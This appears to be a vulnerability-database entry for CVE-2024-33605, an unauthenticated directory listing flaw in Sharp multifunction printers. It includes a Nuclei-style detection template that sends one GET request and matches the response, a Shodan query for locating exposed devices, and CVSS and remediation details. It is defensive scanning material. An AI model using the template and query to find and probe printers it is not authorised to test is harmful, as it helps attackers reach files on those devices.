漏洞描述
It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file.
CVE-2024-33605: Sharp Multifunction Printers - Directory Listing
PoC代码[已公开]
id: CVE-2024-33605
info:
name: Sharp Multifunction Printers - Directory Listing
author: gy741
severity: high
description: |
It was observed that Sharp printers are vulnerable to an arbitrary directory listing without authentication. Any attacker can list any directory located in the printer and recover any file.
impact: |
Unauthenticated attackers can list arbitrary directories and recover files from Sharp multifunction printers.
remediation: |
Apply all relevant security patches and product upgrades for Sharp multifunction printers.
reference:
- https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-arbitrary-directory-listing
- https://jvn.jp/en/vu/JVNVU93051062/index.html
- https://global.sharp/products/copier/info/info_security_2024-05.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-33605
cwe-id: CWE-22
epss-score: 0.51432
epss-percentile: 0.97794
cpe: cpe:2.3:o:sharp:mx-3550v_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: "Set-Cookie: MFPSESSIONID="
product: mx-3550v_firmware
vendor: sharp
tags: cve,cve2024,sharp,printer,traversal,vuln
http:
- method: GET
path:
- "{{BaseURL}}/installed_emanual_list.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ServiceEmanualList'
- '/installed_emanual_down.html'
condition: and
- type: word
part: header
words:
- "Set-Cookie: MFPSESSIONID="
- type: status
status:
- 200
# digest: 4a0a004730450220008a18408b217262841ccaeb78737f7b9b36748a2c60c1b1f6c8650433941361022100bbeb5d80917045ebc52bb4968003ca66c048a447370a48303812db1c92b8aba0:922c64590222798bb761d5b6d8e72950